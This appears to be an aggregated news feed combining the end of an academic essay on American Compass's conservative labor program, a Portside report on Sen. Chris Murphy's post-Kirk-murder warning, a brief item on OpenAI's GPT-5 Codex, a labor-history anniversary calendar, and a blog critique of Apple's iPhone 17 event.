The institutional and ideological parameters of American Compass’ new social compact illuminate the contradictions inherent in conservative welfare state building. The design of the FISC recalls the abortive Family Assistance Plan (FAP) put forward by the Nixon administration which also called for at once dramatically expanding the provision of social welfare to working couples with children while dramatically limiting how much they could claim and for how long.
14
Much like the FAP, the FISC frames the skyrocketing cost of living as a moral as much as a material crisis threatening the long-term reproducibility of the nuclear family, itself the cradle for reproducing labor productivity and discipline. Both programs also understood that capital was shirking its share of responsibility for meeting this basic biopolitical objective. Indeed, in the 1970s, the FAP failed precisely because organized industry and employer groups lobbied hard to convince legislators that any benefit, no matter how paltry, threatened to not only drive up wages (especially among the lowest paid and most desperate workers) but weaken their power over workplaces.
15
While Cass and King took pains to address those concerns in the twenty-first century, prospective conservative welfare state builders—just like their Keynesian rivals—still face the almost implacable hostility of employers to anything that might undermine their unilateral power on the job.
16
Since the FISC only provides for a small childcare subsidy, the bulk of the money needed to hold together the nuclear family still needs to come from higher wages in the labor market.
“A Seat at the Table”
While employers covet such absolute authority on the job, Cass argues that the purpose of public policy is to ensure that managerial prerogatives do not come at the expense of social stability or economic efficiency. In American Compass’ founding letter, Cass drew on classical liberalism to sketch a political economy that allowed for some measure of social struggle to force through necessary changes. The founding principles of the United States’ Constitutional order, he writes, “ensure that prospective competitors can enter our markets, our civil society, and our politics, so that entrenched incumbents face constant pressure—and when some do snap rather than bend, replacements stand ready to fill the void.”
17
For American Compass, that pressure needs to be carefully managed and calibrated to preserve the proper and ostensibly harmonious nature of capitalist markets. A 2020 open letter from American Compass signed by JD Vance, then U.S. Senator Marco Rubio, former U.S. Attorney General Jeff Sessions, and a host of conservative economists and policy analysts concluded: “In a well-functioning and competitive market, participants meet as equals able to advance their interests through mutually beneficial relationships.”
18
That language betrays the contradictions bedeviling any political project to reform capitalist social relations. Who is empowered to decide what constitutes a “mutually beneficial” relationship, and what does it actually mean to “meet as equals” at the point of production and in the corridors of power? Unlike other voices on the right, American Compass makes clear that there needs to be pressure applied on capital to ensure that people earn enough to reproduce themselves as diligent and efficient laborers.
Bringing the appropriate amount of bottom-up pressure to bear on the workplace requires significant labor law reform, as unions and their partisans have long argued. American Compass urges amending the National Labor Relations Act (NLRA) to allow for more “cooperative” deliberative arrangements such as works councils and electing worker representatives to company boards. While the NLRA originally outlawed such set ups to prevent employer-dominated bodies from frustrating genuine worker organizations, American Compass’ Chris Griswold argues the Magna Carta of U.S. labor law instead reinforced an inherently “adversarial” collective bargaining regime. Allowing for more “collaborative” bargaining would create more efficient and less antagonistic workplaces, not to mention increase workers’ ability to win higher wages and better working conditions. That all depends on ensuring that workers’ “voices” are in fact represented and heard, not shunted into company unions.
19
Much like the Family Income Supplemental Credit, giving workers a “seat at the table” demands a tense dance between expanding and containing worker organizing. American Compass recently partnered with YouGov and announced growing public support for unions in general—including barring captive audience meetings and expediting contract negotiations—but not for reforms to enable greater organizing such as card check authorizations, sharing personal contact information with union organizers, or an end to state right-to-work laws.
20
In op-ed pieces, Cass has also denounced unions’ electoral politicking as an impediment to collaborative workplace relations and claims that workers only want apolitical unions.
21
These proposals, as well as claims about what working people want, come as growing numbers of workers are organizing themselves on the job, taking great risks, and winning some important victories. Industrial workers have recently taken to the picket lines at John Deere, Kellogg’s, and the Big Three auto plants to reverse decades-old concessions to management on pay and benefits; Amazon workers are fighting digital Taylorism in warehouses and baristas are fighting the petty tyranny of store managers enforcing corporate discipline as a form of union-busting in Starbucks stores, teachers and nurses have fought to expand gains won over the past decade, while writers and actors recently took on the Hollywood conglomerates in a dual strike. These dramatic work stoppages took place alongside more quotidian (and far-reaching) refusals of onerous and poorly paid work that in turn forced employers to improve pay in care, food service, and retail jobs.
22
At this militant conjuncture, American Compass is busy articulating a preemptive policy program to channel and control workers’ self-activity. After all, without it, workers’ own organizing may well force more expansive reform or win victories beyond the scope of law and legislation.
There are also those in ranks of organized labor who might prefer American Compass’ version of labor law reform. Take, for instance, David Rolf, the former president of Service Workers International Union (SEIU) Local 775 who is now listed as a “Compass Advisor” on the think tank’s website and described reading Cass’
The Once and Future Worker
with delight.
23
In the early 2000s, Rolf presided over Local 775’s successful organizing campaign among nursing-home workers in the Seattle area, one driven almost entirely by top-down negotiations with employers.
24
Rolf’s model of organizing dovetails with the kind of conservative labor movement envisioned by American Compass, one devoid of strikes or political mobilization. Rolf’s success bringing nursing home operators to the table came through establishing a miniature version of the “sectoral bargaining” common to Western Europe whereby tripartite institutions negotiate wages and benefits across entire industries or regions. In a friendly public debate with Rolf, Cass remained skeptical of sectoral bargaining, because it reminded him of the industry-wide “pattern bargaining” between the United Automobile Workers and the Big Three that he believes doomed the domestic auto industry (and that historians have identified as a crucial part of the mid-century movement for building an American social democracy).
25
American Compass’ congressional allies are attempting to find ways to increase workers’ bargaining power without rebuilding a labor movement capable of leveraging contract negotiations with some of the world’s largest corporations into political action. Following Trump’s reelection, Missouri Senator Josh Hawley introduced the Faster Labor Contracts Act to force employers to agree to a contract within ninety days of workers winning union recognition. Hawley’s bill is endorsed by the Teamsters and co-sponsored by Democrats Cory Booker (NJ), Gary Peters (MI), and Jeff Merkley (OR).
26
Hawley’s bill directly confronts the management stonewalling that ultimately beat back the big private-sector organizing wins of the 1970s. Yet the very language of the Faster Labor Contracts Act does not address the many other antiunion tactics that employers have developed over the last half century to keep workers from even having their union recognized.
27
Thus, American Compass’ vision of pro-worker labor law reform remains torn between giving workers a “seat at the table” but without threatening managerial prerogatives over the workplace or in politics.
Targeting Workers, “Tightening” Labor Markets
To square the circle of how to improve the working conditions and living standards of workers without wholly alienating employers and investors, American Compass falls back on the “populist nationalism” long championed by Steve Bannon and that still resonates in the broader Trumpist coalition. It is that organized xenophobia driving Trump’s promise to execute mass deportations by masked federal agents supported by active service military personnel and the courts. This terror has many uses, but one is to accomplish a reversal in the declining fortunes of the “American Worker.” As political scientist Benjamin Braun and economist Cédric Durand point out, Trump’s electoral base after his 2024 win now “expects rising living standards and secure jobs delivered via a tariff-led revival of U.S. manufacturing and a deportation-led tightening of the labor market.”
28
Delivering on those promises without further agitating globally oriented financial markets, not to mention industries dependent on immigrant labor, is its own incredibly tenuous balancing act. At this tense inflection point, American Compass provides the policy language for how to translate mass deportations into raises for a nativist working class.
American Compass’ labor and social policy program suggests a way to plan for a nativist working-class nationalism, even as it navigates the contradictions of achieving this within Trump’s Republican Party.
For American Compass, instituting mandatory E-Verify to severely punish employers who hire undocumented workers offers “one simple trick” to force employers to abandon “cheap labor.” By aggressively policing workplaces and imposing “catastrophic and criminal penalties” on firms who routinely hire undocumented labor, American Compass argues, U.S. employers will confront a “tight labor market,” especially in service and manual labor jobs, and thus will have no choice but to hire documented workers and pay them what they consider fair wages.
29
“Rather than lament all the ‘jobs Americans won’t do,’ which exist only because the law provides non-Americans to do them, policymakers should leave employers no choice but to create jobs Americans will do.”
30
This argument belies the ways that this kind of anti-immigrant policing empowers capital on the job by providing new technologies and capacities for the Department of Homeland Security to (re)classify those who have standing as citizen-workers. Imposing mandatory E-Verify procedures threatens to eliminate any remaining vestiges of New Deal–era industrial citizenship but also the protections of political citizenship for working people. As the political scientist Michael Macshler warns, “workplace enforcement complements rather than contradicts the larger project of making labor into a malleable and cheap commodity.” The Cass co-authored sections of Heritage Foundation’s Project 2025 “Mandate for Leadership,” calling for “a more cooperative model run jointly with management that focuses solely on workplace issues,” overlaps with specific proposals to eviscerate or make meaningless a whole sweep of labor and workplace regulations and protections. “It may be that the undocumented worker is not a relic of the past, but a model for the future in which all workers are expendable, perhaps even deportable, with no protections whatsoever.”
31
This could provide the opening to leverage state police power against not only the unorganized but also the organized.
Building a Conservative Labor Movement
American Compass’ vision for building a “conservative labor movement” challenges many of the right’s long-held assumptions about the proper relations of power on the job in the United States. Only by giving workers a “seat at the table,” Cass, his colleagues, and supporters argue, can the country reverse decades of wage stagnation and restore the efficiency of domestic production, strengthen national security, and rebuild the nuclear family. American Compass’ labor and social policy program suggests a way to plan for a nativist working-class nationalism, even as it navigates the contradictions of achieving this within the coalitional and institutional bounds of Trump’s Republican Party. Reading between the lines of American Compass’ program also betrays a nervousness about the capacity of the right’s extant policy program to contain the percolating militancy of workers hard-pressed by decades of wage stagnation and austerity. It is imperative that working people and their organizations find ways to exploit those tensions, rather than buy into their false promises, to confront the authoritarian drift we now find ourselves in.
Notes
Gabriel Winant, “Exit Right: Moving beyond Corporate Democrats after Trump’s Election,”
LAWCHA Newsletter
(Winter 2025): 7-8.
See Marissa Chappel,
The War on Welfare: Family, Poverty, and Politics in Modern America
(Philadelphia: University of Pennsylvania Press, 2010); Chip Berlet and Matthew N. Lyons,
Right-Wing Populism in America: Too Close for Comfort
(New York: Guildford, 2016); Daniel Martinez HoSang and Joseph E. Lowndes,
Producers, Parasites, Patriots: Race and the New Right-Wing Politics of Precarity
(Minneapolis: University of Minnesota Press, 2019).
On Nixon’s FAP, see Robert O. Self,
All in the Family: The Realignment of American Democracy since the 1960s
(New York: Hill and Wang, 2012), 17-46.
Jill Quadagno, “Race, Class, and Gender in the U.S. Welfare State: Nixon’s Failed Family Assistance Plan,”
American Sociological Review
55, no. 1 (February 1990): 11-28.
See Michal Kalecki, “Political Aspects of Full Employment,”
The Political Quarterly
14, no. 4 (1943): 326.
Following the lead of his SEIU mentor Andy Stern, Rolf eschewed any kind of direct action on the job, instead focusing the campaign on convincing nursing-home operators to accept union representation in select facilities across the region by promising to lobby for increased state Medicaid reimbursements to cover the costs of pay raises and to restrict future bargaining from challenging existing managerial rules in the workplace. The result dramatically increased union representation, but as the late organizer-intellectual Jane McAlevey observed, it excluded nursing-home workers from a say over their working conditions and, over the next fifteen years, they had “achieved little more than their nonunion counterparts” in terms of pay and benefits. Jane F. McAlevey,
No Shortcuts: Organizing for Power in the New Gilded Age
(New York: Oxford University Press, 2016), 78-84.
Oren Cass, “Sectoral Bargaining’s Promise and Peril,”
American Compass
, September 14, 2020, available at
https://americancompass.org/sectoral-bargainings-promise-and-peril/
. On the UAW’s social democracy, see Nelson Lichtenstein,
Walter Reuther: The Most Dangerous Man in Detroit
(Urbana: University of Illinois Press, 1997), 271-98.
See Lane Windham,
Knocking on Labor’s Door: Union Organizing in the 1970s and the Roots of a New Economic Divide
(Chapel Hill: University of North Carolina Press, 2017), 57-82.
Kristoffer Smemo
teaches Labor Studies and is on staff at the UCLA Institute for Research on Labor & Employment. His research explores labor politics and public policy in the United States and is the author of
Making Republicans Liberal: Social Struggle and the Politics of Compromise
, University of Pennsylvania, 2024.
‘Something Dark Might Be Coming’: Senator Rebukes Right’s Weaponization of Kirk Murder To ‘Destroy Dissent’
Portside
portside.org
2025-09-16 02:18:38
‘Something Dark Might Be Coming’: Senator Rebukes Right’s Weaponization of Kirk Murder To ‘Destroy Dissent’
Mark Brody
Mon, 09/15/2025 - 21:18
...
‘Something Dark Might Be Coming’: Senator Rebukes Right’s Weaponization of Kirk Murder To ‘Destroy Dissent’
Published
Sen. Chris Murphy (D.-Conn),(AP Photo/Jacquelyn Martin, File)
A Democratic US senator over the weekend issued an ominous warning about Republicans using the murder of
Charlie Kirk
as a pretense to clamp down on political speech.
In a lengthy social media post on Sunday, Sen. Chris Murphy (D-Conn.)
outlined
how President
Donald Trump
and his allies look set to wage a campaign of retribution against political adversaries by framing them as accomplices in Kirk’s murder.
“Pay attention,” he began. “Something dark might be coming. The murder of Charlie Kirk could have united Americans to confront political violence. Instead, Trump and his anti-democratic radicals look to be readying a campaign to destroy dissent.”
Murphy then contrasted the recent statements by Republican Utah Gov. Spencer Cox, who accurately stated that political violence is not confined to a single political ideology, with those of Trump and his allies, who have said such violence is only a problem on the left.
Murphy highlighted a statement from Trump ally and informal
adviser
Laura Loomer, who
said
that she wanted “Trump to be the ‘dictator’ the left thinks he is” and that she wanted “the right to be as devoted to locking up and silencing our violent political enemies as they pretend we are.”
He then pointed to Trump saying that progressive billionaire financier George Soros should face racketeering charges even though there is no evidence linking Soros to Kirk’s murder or any other kind of political violence.
“The Trump/Loomer/Miller narrative that Dems are cheering Kirk’s murder or that left groups are fomenting violence is also made up,” he added. “There are always going to be online trolls, but Dem leaders are united (as opposed to Trump who continues to cheer the January 6 violence).”
Murphy claimed that the president and his allies have long been seeking a “pretext to destroy their opposition” and that Kirk’s murder gave them an opening.
“That’s why it was so important for Trump sycophants to take over the DoJ and FBI, so that if a pretext arose, Trump could orchestrate a dizzying campaign to shut down political opposition groups and lock up or harass its leaders,” he said. “This is what could be coming—now.”
Early in his second term, the president
fired
FBI prosecutors who were involved in an earlier political violence case—the prosecution of people involved in the violent attack on the US Capitol on January 6, 2021 by Trump supporters who aimed to stop the certification of the 2020 election.
A top ethics official and a lawyer who spoke out against the president’s anti-immigration policy are among those who have been
fired
from the DOJ.
Murphy ended his post with a call for action from supporters.
“I hope I’m wrong. But we need to be prepared if I’m right,” he said. “That means everyone who cares about democracy has to join the fight—right now. Join a mobilization or protest group. Start showing up to actions more. Write a check to a progressive media operation.”
One day after Murphy’s warning, columnist Karen Attiah
announced
that she had been fired from the
Washington Post
over social media posts in the wake of Kirk’s death that were critical of his legacy but in no way endorsed or celebrated any form of political violence.
“The
Post
accused my measured Bluesky posts of being ‘unacceptable,’ ‘gross misconduct,’ and of endangering the physical safety of colleagues—charges without evidence, which I reject completely as false,” she explained. “They rushed to fire me without even a conversation. This was not only a hasty overreach, but a violation of the very standards of journalistic fairness and rigor the
Post
claims to uphold.”
OpenAI is rolling out the GPT-5 Codex model to all Codex instances, including Terminal, IDE extension, and Codex Web (chatgpt.com/codex).
Codex is an AI agent that allows you to automate coding-related tasks. You can delegate your complex tasks to Codex and watch it execute code for you.
Codex
Source: BleepingComputer.com
Even if you don't know programming languages, you can use Codex to "vibe code" your apps and web apps.
But so far, it has fallen a bit short of Claude Code, which is the market leader in the AI coding space.
Today, OpenAI confirmed it's rolling out the Codex-special GPT-5 model.
In a
blog post
, OpenAI stated the GPT-5 Codex model excels in real-world coding tasks, achieving a 74.5% success rate on the SWE-bench Verified benchmark.
In code refactoring evaluations, it improved from 33.9% with GPT-5 to 51.3% with GPT-5-Codex.
GPT-5-Codex is still rolling out. I don't see it on my Terminal yet, even though I pay for ChatGPT Plus ($20).
OpenAI says it will be fully rolled out to everyone in the coming days.
SEPTEMBER 17 IS THE 110TH ANNIVERSARY
of Haiti’s government bowing to overwhelming military and economic pressure and signing a treaty – the Haitian-American Convention of 1915 – that gave the U.S. complete control of Haiti’s financial and government administration for the next 10 years.
Already occupied by U.S. Marines, who had forcibly removed all of the Haitian government’s gold reserve, Haiti’s only choice was between a U.S. occupation that could last indefinitely and an occupation that would, according to the U.S., end after 10 years. Even that agreement was broken by the U.S., which did not end its military occupation until 1934.
https://portside.org/2015-08-01/100-years-after-invasion-humanitarian-occupation-haiti
Slavers Flex Their Political Muscle
SEPTEMBER 18 IS THE 175TH ANNIVERSARY
of the signing of the Fugitive Slave Act of 1850 by U.S. President Millard Fillmore. The 1850 law was a much more draconian version of the existing Fugitive Slave Act of 1793.
The 1850 law greatly strengthened the enforcement powers of both officials and of slave-catchers over anyone they accused of having escaped slavery, at the same time it eliminated almost all of the legal defenses that an accused fugitive could invoke.
https://archive.org/details/slavecatchersenf0000camp/page/n3/mode/2up
Decades of Struggle Wins in the End
SEPTEMBER 19 IS THE 90TH ANNIVERSARY
of an event is an inspiring reminder that the struggle to protect the environment can be won, no matter how long and difficult it may be.
In 1935, the federal government began the construction of a planned 107-mile barge canal across Florida to connect Jacksonville on the Atlantic Ocean and Inglis on the Gulf of Mexico. Environmentalists' opposition to the project was intense because the planned route would have threatened the state's supply of fresh water and destroyed or compromised many sensitive subtropical ecosystems.
Construction proceeded slowly and with long interruptions, until in 1971, when the canal was one-third completed, a lawsuit by the Environmental Defense Fund and Florida Defenders of the Environment resulted in a preliminary injunction. Four days later Richard Nixon ordered an end to the project.
Part of the route of the unfinished canal is now the Marjorie Harris Carr Cross Florida Greenway, named to honor one of the leaders of the effort to stop the canal.
https://www.nrc.gov/docs/ML1204/ML12044A397.pdf
Racial Justice Doesn’t Come Easy
SEPTEMBER 20 IS THE 50TH ANNIVERSARY
of Florida’s governor pardoning two inmates on death row, Freddie Lee Pitts and Wilbert Lee, for a murder they did not commit. The two had already served more than 12 years in prison.
Pitts and Lee, both young Black men who were accused of having murdered two white gas station workers, appealed their convictions multiple times. Their efforts to obtain justice increased three years after they were first convicted, when a man who had no connection with Pitts and Lee confessed to having committed the murders.
Pitts and Lee eventually succeeded in winning the right to a new trial, but they were both convicted again, because the trial judge refused to admit any evidence concerning the third man’s admission of guilt.
Pitts and Lee might have been executed or spent the rest of their lives in prison had it not been for more than eight years of reporting on their case by Gene Miller, a reporter for the Miami Herald. Miller’s reporting convinced Florida governor Rubin Askew to investigate the case, with the result that Askew became convinced of their innocence. Saying that “the evidence which was not available at the trial and is now available is conclusive. These men are not guilty,” Askew pardoned them.
SEPTEMBER 21 IS THE 86TH ANNIVERSARY
of a very early example of a successful lunch-counter sit-in demonstration.
Cafeteria Employees Union Local 302 was on strike against Shack Sandwich Shops in New York City. The union was demanding a closed shop, an end to the employer’s racially discriminatory treatment of the workforce, a 48-hour week, and a very substantial wage increase.
After seven weeks on strike, on September 21, 1939, about a hundred supporters of the union occupied all the seats at one of the struck shops and refused to leave. After repeated sporadic sit-downs continued for more than three weeks, the union and the employer agreed to a contract that substantially satisfied all of the union’s requirements.
https://labortribune.com/opinion-dos-and-donts-of-supporting-a-strike/
‘We Believe in Farmers’
SEPTEMBER 22 IS THE 40TH ANNIVERSARY
of the first Farm Aid benefit concert, which took place in 1985 in Champaign, Illinois, in front of some 80,000 people.
Performers included The Beach Boys, Jimmy Buffett, Glen Campbell, Johnny Cash, John Denver, Bob Dylan, Arlo Guthrie, Merle Haggard, Emmylou Harris, Waylon Jennings, Billy Joel, B.B.King, Carole King, Kris Kristofferson, Loretta Lynn, Randy Newman, Joni Mitchell, Willie Nelson, Roy Orbison, Tom Petty, Bonnie Raitt, Lou Reed, Kenny Rogers, Sissy Spacek and Neil Young, who raised $9 million for the benefit of family farmers facing foreclosure.
Additional Farm Aid benefits have taken place almost annually before huge audiences in venues all over the country, from Connecticut to Washington State, and from Minnesota to Texas. This year’s concert will take place in Minneapolis, Minnesota, on September 20. For tickets to this week’s event and much more information about Farm Aid, visit
https://www.farmaid.org/
Jim Crow Justice for Emmett Till’s Murderers
SEPTEMBER 23 IS THE 70TH ANNIVERSARY
of an all-white jury’s acquittal of Emmett Till’s murderers in Sumner, Mississippi. For a summary of the trial, visit the Equal Justice Initiative’s
https://calendar.eji.org/racial-injustice/sep/23
A first version of this piece was almost ready to be published two days ago, but after writing more than 2,000 words, I grew increasingly angry and exasperated, and that made the article become too meandering and rant-like, so I deleted everything, and started afresh several hours later.
This, of course, is about
Awe-dropping
, Apple’s September 9 event, where they presented the new iPhone lineup, the new AirPods Pro, and the new Apple Watches. And the honest truth here is that I’m becoming less and less inclined to talk about Apple, because it’s a company that I feel has lost its alignment with me and other long-time Apple users and customers.
The more Apple talks and moves like other big tech companies, the less special it gets; the less special and distinctive it gets, the less I’m interested in finding ways to talk about it. Yes, I have admitted that Apple makes me mad lately, so they still elicit a response that isn’t utter indifference on my part. And yes, you could argue that if Apple makes me mad, it means that in the end I still care.
But things aren’t this clear-cut. I currently don’t really care about Apple — I care that their bad software design decisions and their constant user-interface dumbing down may become trends and get picked up by other tech companies. So, what I still care about that’s related to Apple is essentially the consequences of their actions.
The Steve Jobs quote
The event kicked off with the famous Steve Jobs quote,
Design is not just what it looks like and feels like. Design is how it works.
and I immediately felt the whiplash.
Why that quote? Why now, after months of criticism towards the new design æsthetic of Liquid Glass? I gave this choice three possible interpretations — I still may be missing something here; I’m sure my readers will let me know.
It’s Apple’s way of trolling the critics, who have repeatedly resorted to Steve Jobs’s words to criticise the several misguided UI choices in Liquid Glass. It’s the same kind of response as Phil Schiller famously blurting,
Can’t innovate anymore, my ass!
in 2013 during the presentation of the then-redesigned Mac Pro. But it feels like a less genuine, more passive-aggressive response (if this is the way we’re supposed to read their use of that quote).
Apple used the quote in earnest. As in, they really believe that what they’re doing is in line with Jobs’s words. If that’s the case, this is utter self-deception. The quote doesn’t reflect at all what Apple is doing in the UI and software department — the Liquid Glass design is more ‘look
&
feel’ than ‘work’. And the very introduction of the iPhone Air proves that Jobs’s words are falling on deaf ears on the hardware front as well.
Apple used the quote ‘for effect’. As if Meta started a keynote by saying,
Our mission is to connect people, no more no less.
You know, something that makes you sound great and noble, but not necessarily something you truly believe (or something that is actually true, for that matter).
I can’t know for sure which of these might be the correct interpretation. I think it heavily depends on whose Apple executive came up with the idea. Whatever the case may be, the effect was the same — it felt really jarring and tone-deaf.
AirPods and Watches
If you’re not new here, you’ll know that these are the Apple products I care the least, together with HomePods and Apple TV. I always tune out when Apple presents these, so browse Apple’s website or go read the technical breakdown elsewhere. Personally, I’m too into traditional horology and therefore the design of the Apple Watch has always felt unimaginative at best, and plain ugly at worst.
From a UI standpoint, the Apple Watch continues to feel too complicated to use, and too overburdened with features. I wouldn’t say it’s design by committee, but more like designed to appeal to a whole committee. Apple wants the watch to appeal to a wide range of customers, therefore this little device comes stuffed with all kinds of bells and whistles. As I said more than once, the real feature I would love to see implemented is the ability to just turn off entire feature sets, so that if you only want to use it as a step counter and heart rate monitor, you can tell the watch to be just that; this would be more than just having a watchface that shows you time, steps, heart rate — it would be like having a watch that does
only that
. With all the features you deem unnecessary effectively disabled, imagine how simpler interacting with it would be, and imagine how longer its battery life would be.
What really got on my nerves during the Apple Watch segment of the event, though, is this: Apple always,
always
inserts a montage of sob stories about how the Apple Watch has saved lives, and what an indispensable life-saving device it is. Don’t get me wrong, I’m glad those lives were saved. But this kind of ‘showcase’ every year is made in such poor taste. It’s clear to me that it’s all marketing above everything else, that they just want to sell the product, and these people’s stories end up being used as a marketing tactic. It’s depressing.
As for the AirPods, and true wireless earbuds in general, I find this product category to be the most wasteful. Unless someone comes up with a type of earbuds that have easily replaceable batteries, I’m not interested in buying something that’s bound to become e‑waste in a relatively short period of time.
The new iPhones
Don’t buy them. Don’t waste your money, unless you have money to waste and don’t care about a company with this kind of leadership. Read
How Tim Cook sold out Steve Jobs
by Anil Dash to understand how I feel. I couldn’t have said it better myself.
I’d wrap up my article here, but then I’d receive a lot of emails asking me why I didn’t talk about the iPhones, so here are a few stray observations:
One, maybe involuntary, user-friendly move Apple did with this new iPhone lineup is that now we have three very distinct iPhone models, whose nature and price should really help people decide which to purchase.
The regular
iPhone 17
is the safe, iterative solution. It looks like an iPhone 16, it works like an iPhone 16 that has now better features. It’s the ideal phone for the average user (tech-savvy or not). It’s the safe choice and the best value iPhone overall.
The
iPhone 17 Pro
is possibly the most Pro iPhone to date. During its presentation, I felt like Apple wants you to consider this more like a pro camera for videographers and filmmakers rather than just a smartphone with a good camera array. People who have no use for all these pro video recording features shouldn’t waste their money on it. Unless they want a big chunky iPhone with the best camera array and/or have money to burn. In my country (Spain), the 6.3‑inch iPhone 17 Pro starts at €1,319 with 256GB of storage, and goes up to €1,819 with 1TB of storage. For the bigger iPhone 17 Pro, those prices become €1,469 and €1,969 respectively, and if you want the iPhone 17 Pro Max with 2TB of storage, it’ll cost you €2,469. You do you, but I think these are insane prices for phones (and SSDs).
The
iPhone Air
is just… odd. I was curious to know about other techies’ reactions, and of all the major tech YouTubers, I think the one I’m agreeing the most on their first impressions of the iPhone Air is Marques Brownlee.
At this point
in his video, he says:
I really think this phone is gonna be a hard sell, because if you subtract emotions from it, it’s just… the worst one. This is gonna jump in the lineup at $999 — it replaces essentially the Plus phones in the lineup — and it is surrounded by other iPhones that are better than it in basically every way, other than being super thin and light. So it’s a fascinating gamble.
This phone has the same A19 Pro chip in it as the Pro phones, minus one GPU core. Interesting choice: apparently it’s a bit more efficient than the base A19, so that’s good for battery life. But we also just heard a whole long list of choices Apple made with the Pro phones to make them more thermally efficient to not overheat — switching from titanium to aluminium, and adding a vapour chamber to the back. But this phone is
still
titanium, and absolutely does not have room for an advanced thermal solution or any sort of vapour chamber, so it sounds like this phone could get much hotter and throttle performance much quicker. It’s a red flag.
Now we also know that ultra-thin phones have a tendency to be a little bit less durable. They’ve bent over the years. And I’m not gonna be the first one to point this out. […] And Apple of course has thought about this. They’ve for sure tested this, and they’re telling us it’s the most durable iPhone ever. But, I mean, I’m looking at the phone and I think it qualifies also as a red flag. And then we already know there is just no way battery life can be good on this phone, right? There’s just no way. I’ve been reviewing phones for more than a decade, and all signs point to it being trash.
There was a slide in the keynote today about how they were still proud to achieve ‘all-day battery life’. But, like, come on. Really? I mean they still do the thing where they rearranged the components up into the little plateau at the top to make room for more battery at the bottom. But there’s just absolutely not enough room in this phone for a large battery. And it doesn’t appear to be silicon-carbon, or any sort of a special ultra-high density battery.
And Apple also announced it alongside a special dedicated MagSafe battery accessory, just for this phone, that adds 3,149 mAh, and just barely, combined, will match the 17 Pro in terms of quoted video playback. So if that doesn’t scream red flag, I don’t know what to tell you.
It is also e‑SIM-only, globally, ’cause there’s no room in any version of this phone for a plastic SIM card. There’s also no millimeter-wave 5G. And like I said, it’s coming in at $1,000, which is more expensive than the base iPhone, which will have a better camera system, and better battery life, and may overheat less.
So look, I think there’s two ways to look at this phone. This is either Apple just throwing something new at the wall and seeing if it sticks. […] Or you can see this as a visionary, long-time-in-the-making preview at the future of all phones. Like, maybe someday in the future every phone will be this thin. And Apple is just now, today, getting the tech together with the battery and display and modem and Apple Silicon to make this phone possible. Maybe kind of like how the first MacBook Air sucked, and was underpowered, but then eventually all laptops became that thin. Maybe that’s also what’s gonna happen to smartphones. And maybe the same way Samsung made the ultra-thin S25 Edge, and then a few months later they came out with their super-thin foldable, the Z Fold7, and I felt like the Edge phone was one half of that foldable. Maybe that’s also what Apple’s doing. Maybe we’re gonna see an ultra-thin foldable iPhone next year. Maybe.
Yeah, I’m firmly in the “Apple throwing something new at the wall and seeing if it sticks” camp. Because what’s that innovative in having thin smartphones? What’s the usefulness when the other two dimensions keep increasing? Making a thin and light and relatively compact MacBook and calling it ‘Air’ made sense back when virtually no other laptop was that thin and light. It was, and is, a great solution for when you’re out and about or travelling, and space is at a premium; and you also don’t want a bulky computer to lug around.
Then Apple applied the ‘Air’ moniker to the iPad, and that started to make less sense. It’s not that a regular or Pro iPad were and are that cumbersome to begin with. And then Apple felt the need to have MacBook Airs that are 13- and 15-inch in size, instead of 11- and 13-inch. A 15-inch MacBook Air makes little sense, too, as an ‘Air’ laptop. It may be somewhat thin, somewhat light, but it’s not exactly compact.
And now we have the iPhone Air — which is just thin for thinness’ sake. It’s still a big 6.5‑inch phone that’s hardly pocketable. I still happen to handle and use a few older iPhones in the household, and the dimensions of the iPhone 5/5S/SE make this iPhone more ‘Air’ than the iPhone Air. If you want a slightly more recent example, the iPhone 12 mini and 13 mini have the real
lightness
that could make sense in a phone. Perhaps you’ll once again remind me that the iPhone 12 mini and 13 mini weren’t a success, but I keep finding people telling me they would favour a more compact phone than a big-but-thin phone. I’ll be truly surprised if the iPhone Air turns out to be a bigger success than the ‘mini’ iPhones. It is a striking device in person, no doubt, but once this first impact is gone and you start thinking it over and making your decision, what Marques Brownlee said above is kind of hard to deny.
I find particularly hilarious the whole MagSafe battery accessory affair. Apple creates a super-thin, super-light phone, proudly showcases its striking design, and immediately neutralises this bold move and thin design by offering an accessory 1) that you’ll clearly need if you want to have a decently-lasting battery (thus admitting that that thinness certainly came with an important compromise); and 2) that instantly defeats the purpose of a thin design by returning the bulk that was shaved away in making the phone.
What should I be in awe of?
I found a lot of reactions to these products to be weirdly optimistic. Either I’m becoming more cynical with age and general tech fatigue, or certain people are easily impressed. What usually impresses me is some technological breakthrough I didn’t see coming, or a clever new device, or some clever system software features and applications that give new purposes to a device I’ve known well for a while. This event, and what was presented, didn’t show any of this.
Didn’t you expect Apple to be able to produce yet another iteration of Apple Watches and AirPods that were better than the previous one? Didn’t you expect Apple to be able to make a unibody iPhone after years of making unibody computers? Didn’t you expect Apple to be able to have iPhones with better cameras and recording capabilities than last year’s iPhones? Didn’t you expect Apple to be able to make a thinner iPhone? To come up with better chips? Or a vapour chamber to prevent overheating? Or a ‘centre stage’ feature for the selfie camera? Are these things I should be in awe of?
I will probably be genuinely amazed when Apple is finally able to come up with a solution that entirely removes the dynamic island from the front of the iPhone while still having a front-facing camera up there.
I’ll be similarly amazed when Apple finally gets rid of people who have shown to know very little about software design and user interfaces, and comes up with operating systems that are, once again, intuitive, discoverable, easy to use, and that both look and work well. Because the iOS, iPadOS, and Mac OS 26 releases are
not it
— and these new iPhones might be awe-inspiring all you want, but you’ll still have to deal with iOS 26 on them. These new iPhones may have a fantastic hardware and all, but what makes any hardware tick is the software. You’ve probably heard that famous quote by Alan Kay,
People who are really serious about software should make their own hardware
. Steve Jobs himself quoted it, adding that “this is how we feel about it” at his Apple. Today’s Apple needs to hear a revised version of that quote, something like,
People who are this serious about their hardware should make better software for it
.
The level of
good-enough-ism
Apple has reached today in software is downright baffling. This widening gap between their hardware and software competence is going to be really damaging if the course isn’t corrected. The tight integration between hardware and software has always been what made Apple platforms stand out. This integration is going to get lost if Apple keeps having wizards for hardware engineers on one side, and software and UI people producing amateurish results on the other side. Relying on legacy and unquestioning fanpeople, for whom everything Apple does is good and awesome and there’s nothing wrong with it, can only go so far. Steve Jobs always knew that software is comparatively more important than the hardware. In a 1994 interview with Jeff Goodell, published by
Rolling Stone
in 2010 (
archived link
), Jobs said:
The problem is, in hardware you can’t build a computer that’s twice as good as anyone else’s anymore. Too many people know how to do it. You’re lucky if you can do one that’s one and a third times better or one and a half times better. And then it’s only six months before everybody else catches up. But you can do it in software.
But not if you keep crippling it because you want to bring all your major platforms to the lowest common denominator.
A bug was recently reported in
pg.zig
which was the result of a dangling pointer to an ArenaAllocator
(1)
